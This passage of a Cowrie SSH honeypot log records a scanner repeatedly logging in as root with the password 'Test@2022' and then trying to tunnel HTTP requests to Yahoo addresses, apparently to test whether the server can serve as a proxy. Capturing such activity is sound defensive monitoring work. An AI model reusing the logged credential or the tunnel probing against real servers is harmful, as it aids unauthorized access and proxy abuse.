cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.314100Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.597914Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15121,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15121","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.655525Z","session":"afb10b7eb37e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.712264Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8069,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8069","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.867029Z","session":"afb10b7eb37e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.923980Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:44.981356Z","src_ip":"213.209.150.239","session":"afb10b7eb37e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9838,"dst_ip":"1.2.3.4","dst_port":22,"session":"634f844b8231","protocol":"ssh","message":"New connection: 213.209.150.239:9838 (1.2.3.4:22) [session: 634f844b8231]","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.027419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.028428Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.075765Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.310309Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25566,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25566","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.358094Z","session":"634f844b8231"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.405307Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7662,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7662","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.541499Z","session":"634f844b8231"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.588946Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.636884Z","src_ip":"213.209.150.239","session":"634f844b8231"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9872,"dst_ip":"1.2.3.4","dst_port":22,"session":"61dc41872b81","protocol":"ssh","message":"New connection: 213.209.150.239:9872 (1.2.3.4:22) [session: 61dc41872b81]","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.683132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.692528Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.730488Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:45.965549Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27455,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27455","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.013522Z","session":"61dc41872b81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.060771Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":6290,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6290","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.205466Z","session":"61dc41872b81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.253275Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.301575Z","src_ip":"213.209.150.239","session":"61dc41872b81"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9924,"dst_ip":"1.2.3.4","dst_port":22,"session":"38032fcf5a1b","protocol":"ssh","message":"New connection: 213.209.150.239:9924 (1.2.3.4:22) [session: 38032fcf5a1b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.347518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.348533Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.395971Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":37190,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9fea2c190ff","protocol":"ssh","message":"New connection: 27.112.78.170:37190 (1.2.3.4:22) [session: b9fea2c190ff]","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.610969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.611733Z","src_ip":"27.112.78.170","session":"b9fea2c190ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.630782Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21009,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21009","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.678616Z","session":"38032fcf5a1b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.725934Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2646,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2646","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.861639Z","session":"38032fcf5a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.872255Z","src_ip":"27.112.78.170","session":"b9fea2c190ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.908913Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:46.957282Z","src_ip":"213.209.150.239","session":"38032fcf5a1b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":9963,"dst_ip":"1.2.3.4","dst_port":22,"session":"22c57c8de54d","protocol":"ssh","message":"New connection: 213.209.150.239:9963 (1.2.3.4:22) [session: 22c57c8de54d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.013209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.014020Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.070638Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.352959Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":30333,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:30333","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.410539Z","session":"22c57c8de54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.467312Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12238,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12238","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.623204Z","session":"22c57c8de54d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.679770Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.737875Z","src_ip":"213.209.150.239","session":"22c57c8de54d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":10155,"dst_ip":"1.2.3.4","dst_port":22,"session":"17b07620c5d2","protocol":"ssh","message":"New connection: 213.209.150.239:10155 (1.2.3.4:22) [session: 17b07620c5d2]","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.793505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.803633Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes2